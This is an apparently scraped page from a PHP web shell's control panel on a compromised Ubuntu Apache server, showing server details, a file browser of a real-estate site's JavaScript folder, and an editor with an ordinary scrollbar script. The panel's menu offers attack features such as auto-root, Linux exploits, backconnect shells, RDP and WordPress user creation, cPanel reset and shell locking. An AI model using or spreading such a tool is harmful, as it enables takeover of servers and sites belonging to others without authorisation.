Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.18
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
public /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
config.js
800
B
-rwxr-xr-x
custom.js
3.1
KB
-rwxr-xr-x
dashboards-analytics.js
9.4
KB
-rwxr-xr-x
extended-ui-perfect-scrollbar....
1.06
KB
-rwxr-xr-x
form-basic-inputs.js
188
B
-rwxr-xr-x
main.js
5.28
KB
-rwxr-xr-x
pages-account-settings-account...
852
B
-rwxr-xr-x
ui-modals.js
1.04
KB
-rwxr-xr-x
ui-popover.js
443
B
-rwxr-xr-x
ui-toasts.js
1.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : extended-ui-perfect-scrollbar.js
/** * Perfect Scrollbar */ 'use strict'; document.addEventListener('DOMContentLoaded', function () { (function () { const verticalExample = document.getElementById('vertical-example'), horizontalExample = document.getElementById('horizontal-example'), horizVertExample = document.getElementById('both-scrollbars-example'); // Vertical Example // -------------------------------------------------------------------- if (verticalExample) { new PerfectScrollbar(verticalExample, { wheelPropagation: false }); } // Horizontal Example // -------------------------------------------------------------------- if (horizontalExample) { new PerfectScrollbar(horizontalExample, { wheelPropagation: false, suppressScrollY: true }); } // Both vertical and Horizontal Example // -------------------------------------------------------------------- if (horizVertExample) { new PerfectScrollbar(horizVertExample, { wheelPropagation: false }); } })(); });
Close